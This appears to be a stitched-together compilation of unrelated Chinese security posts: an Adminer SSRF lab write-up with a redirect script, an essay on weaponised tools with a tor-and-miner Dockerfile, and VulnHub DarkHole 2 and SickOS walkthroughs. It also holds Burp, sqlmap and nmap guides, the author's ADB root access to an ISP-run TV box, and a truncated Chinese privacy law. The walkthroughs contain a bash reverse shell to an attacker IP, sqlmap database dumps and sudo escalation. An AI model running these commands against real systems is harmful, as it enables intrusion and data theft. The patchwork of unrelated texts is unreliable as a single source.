adminer版本是4.7.8，是php编写的 [数据库管理工具] ，存在漏洞 CVE-2021-21311 ，它是 Adminer 版本 4.0.0 中的服务器端请求伪造,到 4.7.9。

此漏洞是 [SSRF] ，服务端请求伪造

adminer服务端ip为http://10.22.234.145/

Adminer登录页面，选择ElasticSearch作为系统目标，并在server字段填写example.com，点击登录即可看到example.com返回的400错误页面展示在页面中

在10.132.1.39启动一个python服务器，该服务监听传入的连接

漏洞利用成功，可以看到页面上就显示了flag.txt文件的内容。

当然在这里官方也提供了一个更便捷的python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

import http.server
import socketserver

class RedirectHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # 设置重定向到指定URL
        self.send_response(301)  # 301: 永久重定向
        self.send_header('Location', 'http://10.22.234.145:80/flag.txt')  # 设置重定向地址
        self.end_headers()

def run(server_class=http.server.HTTPServer, handler_class=RedirectHandler):
    server_address = ('', 1111)  # 监听1111端口
    httpd = server_class(server_address, handler_class)
    print('Server running on port 80...')
    httpd.serve_forever()

if __name__ == '__main__':
    run()

漏洞利用成功，可以看到页面上就显示了flag.txt文件的内容。

该靶场由NextCyber提供，如果你也对渗透测试感兴趣，这个平台是个不错的选择。
地址:nextcyber

我盯着屏幕上跳动的警报，端起凉透的咖啡猛灌一口。凌晨三点，安全运营中心冷白的灯光下，又一波异常流量正疯狂冲击着客户边缘节点。这不是普通的DDoS攻击——攻击者正在用客户自己的云日志服务作为跳板，把正常功能扭曲成攻击武器。安全行当里最讽刺的事情正在上演：我们精心打造的防御武器库，正在被对手拆解重组，变成刺向自己的利刃。

一、安全边界的崩塌：当「正常」成为「武器」

场景一：云日志服务的「叛变」

某时间处理的安全事件中，攻击者通过泄露的访问密钥（Access Key）侵入某电商平台。他们没有直接窃取数据，而是操控云日志服务：

1. 利用日志服务的写入权限，注入恶意脚本
2. 通过日志查询接口触发脚本执行
3. 在日志流中构建隐蔽的C2通信隧道

我们亲手部署的监控系统，成了黑客的藏身之处。当安全工具开始“背叛”，传统的边界防御瞬间形同虚设。

场景二：办公软件的「双面人生」

某金融公司内网检测到异常横向移动。溯源发现攻击链起点竟是技术部门的内部交流群：

• 攻击者将恶意代码隐藏在“项目进度表.xlsx”宏指令中
• 利用聊天软件的@全员功能确保广泛传播
• 通过软件自带的屏幕共享功能进行内部侦察

沟通工具变成了攻击导管，这种对信任体系的腐蚀比技术漏洞更致命。

二、攻击者的工具箱：来自我们自己的馈赠

黑客的军火库里，正堆满我们“赠送”的武器：

1. API网关：黑客的免费地铁
)

某物联网平台遭遇大规模数据泄露，根源竟是公开的调试接口：

plaintext

1
2
3
4

# 攻击者利用的“合法”请求链
1. POST /api/v1/debug/device_logs (获取设备ID列表)
2. GET /api/v1/devices/{id}/config?admin_token=leaked_value (提取配置)
3. PUT /api/v1/firmware/update (植入后门固件)

这些接口文档就挂在开发者门户上，攻击者甚至不需要暴力破解。

2. CDN服务：恶意流量的隐身衣

最近阻断的撞库攻击显示：

• 76%的恶意请求来自知名CDN服务IP
• 攻击者注册免费CDN账户绑定恶意域名
• 利用CDN的全球节点隐藏真实源IP

我们用来加速网站的工具，成了攻击者的全球代理网络。

3. 容器技术：完美的犯罪胶囊

在挖矿攻击中发现新型逃逸技术：

dockerfile

1
2
3
4

FROM alpine:latest
RUN apk add --no-cache tor 
COPY miner /tmp/
CMD ["sh","-c","tor & /tmp/miner --quiet"]

攻击者通过漏洞在K8s集群部署临时容器，资源消耗达阈值后自动销毁证据，整个过程不到15分钟。

三、重构防御：在混沌中建立新秩序

当武器库开始反噬，我们需要更聪明的防御策略：

1. 行为基因库建设

在客户环境部署的行为分析系统捕获的异常序列：

plaintext

1
2
3
4
5

[正常行为] 
日志写入 -> 日志查询 -> 结果下载 

[攻击行为]
日志写入 -> 高频精准查询 -> Base64编码结果导出 -> 外部IP通信

通过建立200+维度的行为特征模型，误报率下降62%。

2. 动态诱捕网络

我们部署的云蜜罐捕获的攻击者操作记录：

plaintext

1
2
3
4

2023-08-21 04:17:02 | 攻击者1号进入AWS仿真环境
04:22:15 | 尝试创建IAM角色Policy: AdministratorAccess
04:25:43 | 执行CloudTrail日志删除命令
04:27:11 | 触发伪装密钥告警（实际为陷阱密钥）

通过147个动态变化的诱饵系统，平均延迟攻击者入侵时间3.7小时。

3. 零信任的实战演化

在某医疗客户实施的渐进方案：

plaintext

1
2
3

阶段1：拆除VPN -> 应用级SDP网关
阶段2：静态RBAC -> 动态策略引擎（基于设备健康度+行为评分）
阶段3：4小时会话令牌 -> 连续生物认证（键盘动力学+鼠标行为）

实施后内部威胁事件下降89%，第三方接入风险降低76%。

四、未来战场：正在逼近的暗影

新的风暴正在地平线积聚：

AI社工攻击

最近截获的AI钓鱼样本特征：

• 精准模仿CEO邮件风格（基于公开演讲训练）
• 嵌入客户合同专用术语
• 使用Deepfake语音验证指令

量子勒索的倒计时

我们的密码迁移压力测试显示：

• 传统VPN隧道升级后吞吐量下降40%
• HSM设备量子抗性改造周期需9-14个月
• 部分旧医疗设备无法支持新协议

五、坚守的意义：在数字废墟中重建信任

凌晨的告警终于平息。窗外天色微明，屏幕上的防御矩阵图缓缓旋转。这个职业教会我最重要的事：安全不是技术竞赛，而是守护人性的战争。

当看到黑客利用我们开发的工具作恶时，与其愤怒，不如行动：

1. 在代码审查中加入“武器化风险评估”
2. 为每个新功能设计“防滥用熔断器”
3. 用攻击者思维重新审视自己的系统

我们建造城墙，不仅为了抵御外敌，更为证明：在技术与人性的交锋中，守护的意志终将胜过破坏的贪婪。这或许就是为什么，在无数个这样的凌晨，我们仍选择坐在屏幕前——因为相信，每一道精心设计的防御，都在让数字世界少一个沉默的受害者。

后记
文末互动：
【你遇到过最“讽刺”的安全事件是？】

一、环境搭建

靶机下载

靶机下载地址：https://vulnhub.com/entry/darkhole-2,740/

启动靶场

二、信息收集

确定靶机地址

1

arp-scan -l

端口扫描

1

nmap -v -A -sV -p- 192.168.147.133

经过扫描查看开放了22、80端口

访问HTTP端口:80

进行目录扫描，查看可以访问目录

可以看到,扫描到了.git文件,之后我们可以使用工具将代码还原

指纹识别

三、Web渗透

利用.git还原代码

由于主界面是login，但是我们并没有用户名以及密码

可以从其他地方进行突破.

/.git/：可以通过/.git/得到网页源代码

1

http://192.168.147.133/.git/

使用Dump all下载git文件夹内所有文件

安装git-dumper

使用git-dumper下载git文件夹内容

1

git-dumper http://192.168.147.133/.git/ 192.168.147.133 

切换到192.168.147.133文件夹,查看日志

出现了三次提交,还有哈希值,作者,时间等.

对比三次提交

git diff #获得当前目录上次提交和本地索引的差距,也就是你在什么地方修改了代码.

这里我们逐个查看:

其中发现了账户邮箱以及密码

1
2

lush@admin.com
321

登录网页

进行登录测试

进到页面之后发现url有id=1的参数值,这里可以试一试SQL注入

确定存在sql注入点

使用sqlmap直接梭哈

1

http://192.168.147.133/dashboard.php?id=1%27

发现页面主进不去，尝试使用cookie注入

获取当前用户的Cookie: “F12”->”网络”->”200”->”消息头”->”请求头”->”Cookie”

1

sqlmap -u "192.168.147.133/dashboard.php?id=1" --cookie PHPSESSID=cuk869g1jts78vt9h9pchvol66 --batch --current-db

这里我们获取到了数据库名:darkhole_2

我们这里在获取他的表名

1

sqlmap -u "192.168.147.133/dashboard.php?id=1" --cookie PHPSESSID=cuk869g1jts78vt9h9pchvol66 --batch -D darkhole_2 --tables

得到两个表: ssh / users

查看ssh表,用于我们后面进行ssh连接.

1

sqlmap -u "192.168.147.133/dashboard.php?id=1" --cookie PHPSESSID=cuk869g1jts78vt9h9pchvol66 --batch -D darkhole_2 -T ssh --dump-all

知道ssh的用户名和密码之后,我们可以尝试ssh连接.

1

ssh jehad@192.168.147.133

ssh登录成功。可直接进losy用户，第一个flag。

1

cd /home/jehad && cat user.txt

四、提权

查看权限

1

id

发现我们并不是0用户(root)

查看活动端口

发现本地有9999端口的服务.

1

netstat -lntp

查看一下本地服务的内容

1

curl "http://127.0.0.1:9999/?cmd=id"

查看Crontab定时任务：**cat /etc/crontab，发现定时任务，执行/opt/web里面的PHP代码，并且监听9999端口**

查看一下**/opt/web/index.php**的PHP代码，发现是一个PHP后门代码

获取losy的权限

重新连接登陆 ssh，将本地端口 9999 端口与远程主机端口映射，访问本地端口转发到远程主机

1

ssh  jehad@192.168.147.133  -L  9999:localhost:9999

反弹shell

记得我们查看过9999端口运行的程序，当我们看到源代码的内容时，我们看到这允许远程命令执行。而且这个脚本属于用户losy，然后我们就可以使用 SSH 隧道连接端口 9999，然后，访问 127.0.0.1:9999 进行 RCE。大概原理就是这样。

构造连接kali的命令:

1

bash   -c   ‘bash -i >& /dev/tcp/192.168.147.131/1234>&1’

使用URL 16进制编码:Url 编码/解码 - 在线工具 (toolhelper.cn)

1

curl "127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.147.131%2F1234%200%3E%261'"

kali再开一个窗口进行监听:

1

nc -lvnp 1234

在cmd处传入反弹Shell的参数，不过需要url编码一下，执行命令

成功反弹Shell之后，搜索了一番之后，在losy的用户目录下的**.bash_history文件中发现了losy密码：gang**

切换用户

SSH切换为losy用户：**su - losy，输入sudo -l**查看一下可以使用 **sudo** 命令执行的权限的命令

发现python3可以用sudo，那就使用python3提权。

1

sudo python3 -c 'import os; os.system("/bin/bash")'

成功拿到第二个flag

环境准备

靶机下载地址：https://www.vulnhub.com/entry/sickos-11,132/
攻击机：Kali Linux（192.168.147.131）
靶机：SICKOS: 1.1（192.168.147.132）

下载好靶机以后，在Vmware导入虚拟环境，SICKOS改为NAT共享主机网络模式

一、信息收集

使用arp-scan确定靶机

确定靶机地址为192.168.147.132

使用nmap查看靶机的端口开放情况

开放端口：22、3128
这里可以看到3128端口是作为代理使用的，想访问80端口必须走3128端口代理

然后访问80端口

发现前端页面目前没有什么可利用的地方，所以进行深一步的探索，进行可访问的目录扫描

目录分别扫描出了/connect、/robots.txt

访问/robots.txt页面

发现/wolfcms页面，进行访问

二、GetShell

查看一下当前页面的指纹信息

发现CMS为wolfcms，查询一下是否有公开的payload

知道当前CMS存在文件上传漏洞，但需要先进到他的后台登陆地址，根据网上的后台地址进行访问

地址为：http://192.168.147.132/wolfcms/?/admin/login

直接弱口令登录，admin、admin，登录成功

登陆成功后左上角点击files，发现文件上传地点

上传成功

需要更改一下监听的IP地址，端口随意

开始监听端口：1234

访问一下木马文件

反弹成功

三、提权过程

找到站点存放目录

发现以下文件

在/var/www/wolfcms目录下面发现数据库配置文件config.php

发现了数据库账号密码，但经过实际查看并没什么有用的信息

查看当前的用户

发现sickos用户，尝试用数据库的密码去登入sickos用户

查看sickos用户的sudo权限

可以看到sickos用户是具有所有权限的，直接使用sudo -i提权为root

在其root目录下发现最终flag，靶机SICKOS: 1.1渗透结束

🔗 官方网站：https://portswigger.net/burp
🔗 社区版下载：https://portswigger.net/burp/communitydownload
🔗 文档中心：https://portswigger.net/burp/documentation

1. Burp Suite 核心概述

Burp Suite 是业界领先的 Web 应用安全测试平台，包含：
✅ 代理拦截（Proxy）
✅ 漏洞扫描（Scanner）
✅ 请求重放（Repeater）
✅ 暴力破解（Intruder）
✅ 爬虫探测（Spider）
✅ 序列分析（Sequencer）
✅ 扩展商店（BApp Store）

支持 Windows/macOS/Linux，社区版免费，专业版含高级扫描功能（$399/年）

2. 安装与配置

安装步骤：

1. 下载安装包（社区版/专业版）
2. 运行安装程序（Java 11+ 必需）
3. 首次启动选择临时项目或创建新项目

浏览器代理配置：

1
2
3

代理地址：127.0.0.1  
代理端口：8080（默认）  
忽略地址：127.0.0.1, localhost  

安装 PortSwigger CA 证书解决 HTTPS 警告：http://burp/cert

3. 核心模块深度解析

A. Proxy（代理拦截）

• 拦截控制：
  • Intercept is on/off 开关拦截
  • Forward 放行请求
  • Drop 丢弃请求
  • Action 右键菜单发送到其他模块
• 历史记录：查看所有经过代理的请求/响应
• 匹配与替换：自动修改特定请求头（如 Cookie）

B. Target（目标分析）

• 站点地图：自动生成应用结构树

• 范围控制：

  1 2 3 4

  Target → Scope → Add 协议：http/https 主机：*.example.com 端口：80,443

• 问题面板：汇总发现的安全漏洞

C. Scanner（漏洞扫描）
（仅专业版）

• 扫描类型：

  • 被动扫描：实时分析流量（零影响）
  • 主动扫描：主动发送测试载荷（可能影响服务）

• 配置策略：

  1 2 3

  New Scan → Scan Configuration 选择：Critical/High 风险漏洞 排除：注销功能等危险路径

D. Intruder（入侵攻击）

• 攻击类型：

  类型	用途
  Sniper	单参数爆破（用户名/密码）
  Battering ram	多参数相同载荷
  Pitchfork	多参数独立字典（用户名+密码）
  Cluster bomb	多参数组合爆破（笛卡尔积）

• 载荷设置：

  1 2 3

  Payloads → Payload set 类型：Simple list / Runtime file / Numbers 添加字典：密码字典/模糊测试字符串

E. Repeater（请求重放）

• 手动修改并重发请求（支持多标签页）
• 对比不同版本响应（Diff 功能）
• 常用场景：
  • 绕过身份验证
  • 测试业务逻辑漏洞
  • 验证输入过滤规则

F. Sequencer（会话分析）

• 分析会话令牌的随机性
• 操作流程：
  1. 捕获包含 Token 的请求（如 Cookie）
  2. 发送到 Sequencer
  3. 点击 Start live capture
  4. 查看熵值分析报告

4. 渗透测试工作流

Step 1：初始配置

1. 浏览器配置 Burp 代理
2. 设置目标范围（Target → Scope）
3. 关闭拦截（Proxy → Intercept off）

Step 2：爬取内容

• 自动爬虫：Target → Site map → Spider this host
• 手动浏览：遍历所有应用功能

Step 3：漏洞扫描

1. 右键目标 → Scan
2. 配置扫描策略（排除破坏性操作）
3. 查看报告（Dashboard → Scan issues）

Step 4：手动测试

• 修改敏感参数（Repeater）
• 爆破关键接口（Intruder）
• 测试越权访问（修改用户ID）

Step 5：生成报告
Report → Generate scan report（HTML/XML）

5. 高级技巧与实战案例

A. 绕过 WAF 技巧

• 分块传输：

  1 2 3

  Proxy → Options → Match and Replace 添加规则：^Content-Length$ 替换为 Transfer-Encoding 值：chunked

• IP 伪造：

  1 2	X-Forwarded-For: 127.0.0.1 Client-IP: 192.168.1.1

B. SQL 注入检测

1. 捕获登录请求发送到 Intruder
2. 标记用户名参数：§username§
3. 载荷选择 SQLi 字典：Payloads → Add from list → SQL Injection
4. 通过响应长度/内容识别注入点

C. 业务逻辑漏洞挖掘

• 价格篡改：

  1	{"product_id":1001, "price": 99.9} → 改为 0.01

• IDOR 越权：

  1	GET /user/profile?user_id=100 → 改为 user_id=101

D. JWT 攻击

1. 发送请求到 Repeater

2. 安装 JWT Editor 扩展（BApp Store）

3. 修改 JWT 载荷：

   1	{"user":"admin", "exp":9999999999}

4. 重新签名发送

6. 扩展生态（BApp Store）

安装路径：Extender → BApp Store

7. 性能优化配置

• 内存分配（启动脚本）：

  1 2 3 4 5

  # Windows (burp.bat) set JAVA_OPTS=-Xmx4g # Linux/macOS java -Xmx4g -jar burpsuite.jar

• 网络设置：

  1 2 3

  Project options → Connections 增加：Max concurrent requests = 50 超时：Socket timeout = 30000ms

• 数据库优化：

  1 2 3

  Project options → Misc → Database 选择：High performance (HSQLDB) 定期：Compact database

8. 安全与合规指南

1. 法律授权：必须获得书面渗透测试授权
2. 备份配置：导出项目设置（Project options → Save settings）
3. 敏感数据处理：
   • 启用项目级加密（Project options → Misc → Encryption）
   • 测试后删除包含认证信息的数据
4. 规避服务影响：
   • 主动扫描使用限速模式（Scan configuration → Resource Pool）
   • 避免在生产环境使用 Intruder 高强度爆破

9. 专业资源推荐

• 官方培训：PortSwigger Web Security Academy（免费实验）

• 书籍推荐：《The Web Application Hacker’s Handbook》

• 社区支持：Burp Suite Forum

• 配置备份：

  1	Project options → Save options → 导出 json

自动化 SQL 注入检测与利用工具
🔗 官方网站：https://sqlmap.org
🔗 GitHub 仓库：https://github.com/sqlmapproject/sqlmap

1. SQLMap 简介

SQLMap 是一款开源的自动化 SQL 注入检测与利用工具，支持：
✅ 数据库指纹识别（MySQL、Oracle、SQL Server 等）
✅ 数据提取（表/列/数据拖取）
✅ 文件系统访问（读/写文件）
✅ 操作系统命令执行（提权操作）
✅ 绕过 WAF/IDS（智能 tamper 脚本）

⚠️ 仅用于授权测试，非法使用将承担法律责任！

2. 安装方法

bash

复制

下载

1
2
3
4
5
6
7

# Kali Linux（预装）
sqlmap -h

# 其他系统
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python sqlmap.py -h

3. 核心参数速查表

4. 高级实战技巧

• Cookie 注入检测：

  bash

  复制

  下载

  1	sqlmap -u "http://site.com" --cookie="id=1*" --level 2

• HTTP 头注入检测（如 User-Agent）：

  bash

  复制

  下载

  1	sqlmap -u <URL> --random-agent --level 3

• 从 Burp 日志导入：

  bash

  复制

  下载

  1	sqlmap -r request.txt

• 导出数据到 CSV：

  bash

  复制

  下载

  1	sqlmap -u <URL> --dump-format=CSV

5. 常用 Tamper 脚本

用于绕过安全设备：

bash

复制

下载

1
2
3

--tamper=space2dash     # 空格替换为 --
--tamper=base64encode   # 参数 Base64 编码
--tamper=chardoubleencode  # 双重 URL 编码

查看所有脚本：sqlmap --list-tampers

6. 注意事项

• ⚠️ 法律合规：必须有目标系统的书面授权。
• ⚠️ 风险控制：避免使用 --os-shell 或 --file-write 等危险参数。
• ⚠️ 隐蔽扫描：添加 --delay=2 降低请求频率，避免触发告警。

网络安全扫描利器

1. 什么是 Nmap？

Nmap（Network Mapper）是一款开源的网络探测和安全审计工具，用于：
✅ 主机发现（哪些设备在线）
✅ 端口扫描（哪些端口开放）
✅ 服务识别（运行的服务及版本）
✅ 操作系统检测（目标设备 OS 类型）
✅ 漏洞扫描（结合脚本引擎 NSE）
广泛应用于渗透测试、网络管理和安全监控。

2. 安装 Nmap

• Linux：

  bash

  复制

  下载

  1 2	sudo apt install nmap # Debian/Ubuntu sudo yum install nmap # CentOS/RHEL

• Windows/macOS：
  下载安装包 → 官方下载页面

3. 基础命令与示例

• 4. 高级技巧

  • 绕过防火墙：

    1 2	nmap -sS -T4 192.168.1.1 # 半开放扫描（SYN 扫描） nmap -f 192.168.1.1 # 分片数据包绕过检测

  • 输出结果保存：

    1 2	nmap -oN result.txt 192.168.1.1 # 文本格式 nmap -oX result.xml 192.168.1.1 # XML 格式

  • 扫描整个子网：

    1	nmap 192.168.1.0/24 # CIDR 格式

5. 常用 NSE 脚本类别

Nmap 脚本引擎（NSE）提供 600+ 脚本：

• auth：身份验证检测
• brute：暴力破解测试
• vuln：已知漏洞扫描
• safe：非侵入式安全检查

1

nmap --script=http-title 192.168.1.1  # 获取网站标题

6. 注意事项

• ⚠️ 合法使用：仅在授权目标上扫描，避免触犯法律。
• ⚠️ 网络影响：高强度扫描可能导致目标设备负载升高。
• ⚠️ 隐蔽模式：使用 -T 调整时序（-T0 最慢，-T5 最快）。

7. 官方资源

🔗 官网：https://nmap.org

• 下载安装包
• 完整文档与图书《Nmap Network Scanning》
• 脚本数据库与社区支持

提示：使用 man nmap 或 nmap --help 查看完整帮助。通过实践逐步掌握复杂功能！

概述

在当今复杂多变的网络安全环境中，确保系统的安全性变得至关重要。为了帮助用户更好地管理和了解系统中安装的安全软件，AVScan 应运而生。作为一个基于 Web 的在线服务，AVScan 专注于识别 Windows 系统内的杀毒软件和其他安全防护程序。通过上传 tasklist /SVC 命令的输出，用户可以快速获取系统中所有正在运行的安全服务的信息，并确认它们是否为已知的合法杀毒软件。

功能特性

AVScan 提供了一系列强大的功能，旨在简化用户对系统安全状态的理解和管理：

• 简单易用的界面：无需复杂的配置或安装，只需访问网站并提交 tasklist /SVC 输出即可开始扫描。
• 即时在线分析：快速处理上传的数据，几乎立即返回分析结果，帮助用户及时采取行动。
• 详细的报告生成：每次扫描后，AVScan 会生成一份详尽的报告，列出所有识别出的服务及其详细信息，包括名称、版本和服务描述等。
• 实时更新的数据库：AVScan 定期更新其内部的杀毒软件和服务数据库，确保能够识别最新的安全产品。
• 隐私保护：尊重用户的隐私，上传的数据不会被保存或用于其他目的，除非用户明确同意。
• 支持多种语言：为了方便全球用户，AVScan 支持多种语言界面，使不同地区的用户都能轻松使用。

使用方法

1. 收集数据：
   • 打开命令提示符（以管理员身份运行）。
   • 输入 tasklist /SVC 并按回车键执行命令。
   • 将产生的输出内容复制到剪贴板。
2. 提交分析：
   • 访问 AVScan官方网站 或您部署的本地实例。
   • 在提供的表单中粘贴之前复制的 tasklist /SVC 输出。
   • 点击“扫描”或类似的按钮提交信息进行分析。
3. 查看结果：
   • 等待几分钟让 AVScan 分析并处理数据。
   • 浏览生成的报告，该报告将列出所有识别出的服务以及它们的安全状态。
   • 对于任何未识别或可疑的服务，建议进一步调查或查阅官方文档。

技术原理

AVScan 的工作原理基于一个不断更新的杀毒软件和服务数据库。当用户上传 tasklist /SVC 的输出时，AVScan 会解析这些信息并与数据库中的条目进行匹配。如果找到匹配项，则表示该服务是已知的合法杀毒软件；如果没有找到匹配项，则可能需要用户进一步验证该服务的合法性。此外，AVScan 还会检查服务的版本号和签名信息，以确保其最新性和可靠性。

开源与贡献

作为一个开源项目，AVScan 的所有代码都公开托管在 GitHub 上。这意味着任何人都可以查看、学习、修改和贡献代码。社区的支持对于项目的持续发展至关重要，因此我们鼓励所有感兴趣的朋友加入进来，共同提升 AVScan 的功能和性能。

关于因为在老家无聊没事扫描了一下内网设备，由于是老人一直在老家，所以宽带是我们省份接管了某动的宽带，使用我们本地接管了的IPTV设备上网。
使用Nmap扫了一下，发现只开启了5555端口，指纹显示是freeciv
百度一下看看…这…（心跳不由得加快了起来）

ADB

1

Android Debug Bridge（安卓调试桥） tools。它就是一个命令行窗口，用于通过电脑端与模拟器或者是设备之间的交互。

开始

在kali中安装adb

1

apt install google-android-platform-tools-installer

安装好以后我们就开始使用adb命令进行远程尝试

没想到竟然是直接获取到了root权限

由于这只是一台电视盒子，并没有什么其他的功能，以至于还不知道这个还能干什么，就简简单单查看一下设备信息

设备应用列表

1

pm list packages -3

查看设备节点内存

1

adb shell df

目 录

第一章 总 则

第二章 个人信息处理规则

第一节 一般规定

第二节 敏感个人信息的处理规则

第三节 国家机关处理个人信息的特别规定

第三章 个人信息跨境提供的规则

第四章 个人在个人信息处理活动中的权利

第五章 个人信息处理者的义务

第六章 履行个人信息保护职责的部门

第七章 法律责任

第八章 附 则

第一章 总 则

第一条 为了保护个人信息权益，规范个人信息处理活动，促进个人信息合理利用，根据宪法，制定本法。

第二条 自然人的个人信息受法律保护，任何组织、个人不得侵害自然人的个人信息权益。

第三条 在中华人民共和国境内处理自然人个人信息的活动，适用本法。

在中华人民共和国境外处理中华人民共和国境内自然人个人信息的活动，有下列情形之一的，也适用本法：

（一）以向境内自然人提供产品或者服务为目的；

（二）分析、评估境内自然人的行为；

（三）法律、行政法规规定的其他情形。

第四条 个人信息是以电子或者其他方式记录的与已识别或者可识别的自然人有关的各种信息，不包括匿名化处理后的信息。

个人信息的处理包括个人信息的收集、存储、使用、加工、传输、提供、公开、删除等。

第五条 处理个人信息应当遵循合法、正当、必要和诚信原则，不得通过误导、欺诈、胁迫等方式处理个人信息。

第六条 处理个人信息应当具有明确、合理的目的，并应当与处理目的直接相关，采取对个人权益影响最小的方式。

收集个人信息，应当限于实现处理目的的最小范围，不得过度收集个人信息。

第七条 处理个人信息应当遵循公开、透明原则，公开个人信息处理规则，明示处理的目的、方式和范围。

第八条 处理个人信息应当保证个人信息的质量，避免因个人信息不准确、不完整对个人权益造成不利影响。

第九条 个人信息处理者应当对其个人信息处理活动负责，并采取必要措施保障所处理的个人信息的安全。

第十条 任何组织、个人不得非法收集、使用、加工、传输他人个人信息，不得非法买卖、提供或者公开他人个人信息；不得从事危害国家安全、公共利益的个人信息处理活动。

第十一条 国家建立健全个人信息保护制度，预防和惩治侵害个人信息权益的行为，加强个人信息保护宣传教育，推动形成政府、企业、相关社会组织、公众共同参与个人信息保护的良好环境。

第十二条 国家积极参与个人信息保护国际规则的制定，促进个人信息保护方面的国际交流与合作，推动与其他国家、地区、国际组织之间的个人信息保护规则、标准等互认。

第二章 个人信息处理规则

第一节 一般规定

第十三条 符合下列情形之一的，个人信息处理者方可处理个人信息：

（一）取得个人的同意；

（二）为订立、履行个人作为一方当事人的合同所必需，或者按照依法制定的劳动规章制度和依法签订的集体合同实施人力资源管理所必需；

（三）为履行法定职责或者法定义务所必需；

（四）为应对突发公共卫生事件，或者紧急情况下为保护自然人的生命健康和财产安全所必需；

（五）为公共利益实施新闻报道、舆论监督等行为，在合理的范围内处理个人信息；

（六）依照本法规定在合理的范围内处理个人自行公开或者其他已经合法公开的个人信息；

（七）法律、行政法规规定的其他情形。

依照本法其他有关规定，处理个人信息应当取得个人同意，但是有前款第二项至第七项规定情形的，不需取得个人同意。

第十四条 基于个人同意处理个人信息的，该同意应当由个人在充分知情的前提下自愿、明确作出。法律、行政法规规定处理个人信息应当取得个人单独同意或者书面同意的，从其规定。

个人信息的处理目的、处理方式和处理的个人信息种类发生变更的，应当重新取得个人同意。

第十五条 基于个人同意处理个人信息的，个人有权撤回其同意。个人信息处理者应当提供便捷的撤回同意的方式。

个人撤回同意，不影响撤回前基于个人同意已进行的个人信息处理活动的效力。

第十六条 个人信息处理者不得以个人不同意处理其个人信息或者撤回同意为由，拒绝提供产品或者服务；处理个人信息属于提供产品或者服务所必需的除外。

第十七条 个人信息处理者在处理个人信息前，应当以显著方式、清晰易懂的语言真实、准确、完整地向个人告知下列事项：

（一）个人信息处理者的名称或者姓名和联系方式；

（二）个人信息的处理目的、处理方式，处理的个人信息种类、保存期限；

（三）个人行使本法规定权利的方式和程序；

（四）法律、行政法规规定应当告知的其他事项。

前款规定事项发生变更的，应当将变更部分告知个人。

个人信息处理者通过制定个人信息处理规则的方式告知第一款规定事项的，处理规则应当公开，并且便于查阅和保存。

第十八条 个人信息处理者处理个人信息，有法律、行政法规规定应当保密或者不需要告知的情形的，可以不向个人告知前条第一款规定的事项。

紧急情况下为保护自然人的生命健康和财产安全无法及时向个人告知的，个人信息处理者应当在紧急情况消除后及时告知。

第十九条 除法律、行政法规另有规定外，个人信息的保存期限应当为实现处理目的所必要的最短时间。

第二十条 两个以上的个人信息处理者共同决定个人信息的处理目的和处理方式的，应当约定各自的权利和义务。但是，该约定不影响个人向其中任何一个个人信息处理者要求行使本法规定的权利。

个人信息处理者共同处理个人信息，侵害个人信息权益造成损害的，应当依法承担连带责任。

第二十一条 个人信息处理者委托处理个人信息的，应当与受托人约定委托处理的目的、期限、处理方式、个人信息的种类、保护措施以及双方的权利和义务等，并对受托人的个人信息处理活动进行监督。

受托人应当按照约定处理个人信息，不得超出约定的处理目的、处理方式等处理个人信息；委托合同不生效、无效、被撤销或者终止的，受托人应当将个人信息返还个人信息处理者或者予以删除，不得保留。

未经个人信息处理者同意，受托人不得转委托他人处理个人信息。

第二十二条 个人信息处理者因合并、分立、解散、被宣告破产等原因需要转移个人信息的，应当向个人告知接收方的名称或者姓名和联系方式。接收方应当继续履行个人信息处理者的义务。接收方变更原先的处理目的、处理方式的，应当依照本法规定重新取得个人同意。

第二十三条 个人信息处理者向其他个人信息处理者提供其处理的个人信息的，应当向个人告知接收方的名称或者姓名、联系方式、处理目的、处理方式和个人信息的种类，并取得个人的单独同意。接收方应当在上述处理目的、处理方式和个人信息的种类等范围内处理个人信息。接收方变更原先的处理目的、处理方式的，应当依照本法规定重新取得个人同意。

第二十四条 个人信息处理者利用个人信息进行自动化决策，应当保证决策的透明度和结果公平、公正，不得对个人在交易价格等交易条件上实行不合理的差别待遇。

通过自动化决策方式向个人进行信息推送、商业营销，应当同时提供不针对其个人特征的选项，或者向个人提供便捷的拒绝方式。

通过自动化决策方式作出对个人权益有重大影响的决定，个人有权要求个人信息处理者予以说明，并有权拒绝个人信息处理者仅通过自动化决策的方式作出决定。

第二十五条 个人信息处理者不得公开其处理的个人信息，取得个人单独同意的除外。

第二十六条 在公共场所安装图像采集、个人身份识别设备，应当为维护公共安全所必需，遵守国家有关规定，并设置显著的提示标识。所收集的个人图像、身份识别信息只能用于维护公共安全的目的，不得用于其他目的；取得个人单独同意的除外。

第二十七条 个人信息处理者可以在合理的范围内处理个人自行公开或者其他已经合法公开的个人信息；个人明确拒绝的除外。个人信息处理者处理已公开的个人信息，对个人权益有重大影响的，应当依照本法规定取得个人同意。

第二节  敏感个人信息的处理规则

第二十八条 敏感个人信息是一旦泄露或者非法使用，容易导致自然人的人格尊严受到侵害或者人身、财产安全受到危害的个人信息，包括生物识别、宗教信仰、特定身份、医疗健康、金融账户、行踪轨迹等信息，以及不满十四周岁未成年人的个人信息。

只有在具有特定的目的和充分的必要性，并采取严格保护措施的情形下，个人信息处理者方可处理敏感个人信息。

第二十九条 处理敏感个人信息应当取得个人的单独同意；法律、行政法规规定处理敏感个人信息应当取得书面同意的，从其规定。

第三十条 个人信息处理者处理敏感个人信息的，除本法第十七条第一款规定的事项外，还应当向个人告知处理敏感个人信息的必要性以及对个人权益的影响；依照本法规定可以不向个人告知的除外。

第三十一条 个人信息处理者处理不满十四周岁未成年人个人信息的，应当取得未成年人的父母或者其他监护人的同意。

个人信息处理者处理不满十四周岁未成年人个人信息的，应当制定专门的个人信息处理规则。

第三十二条 法律、行政法规对处理敏感个人信息规定应当取得相关行政许可或者作出其他限制的，从其规定。

第三节 国家机关处理个人信息的特别规定

第三十三条 国家机关处理个人信息的活动，适用本法；本节有特别规定的，适用本节规定。

第三十四条 国家机关为履行法定职责处理个人信息，应当依照法律、行政法规规定的权限、程序进行，不得超出履行法定职责所必需的范围和限度。

第三十五条 国家机关为履行法定职责处理个人信息，应当依照本法规定履行告知义务；有本法第十八条第一款规定的情形，或者告知将妨碍国家机关履行法定职责的除外。

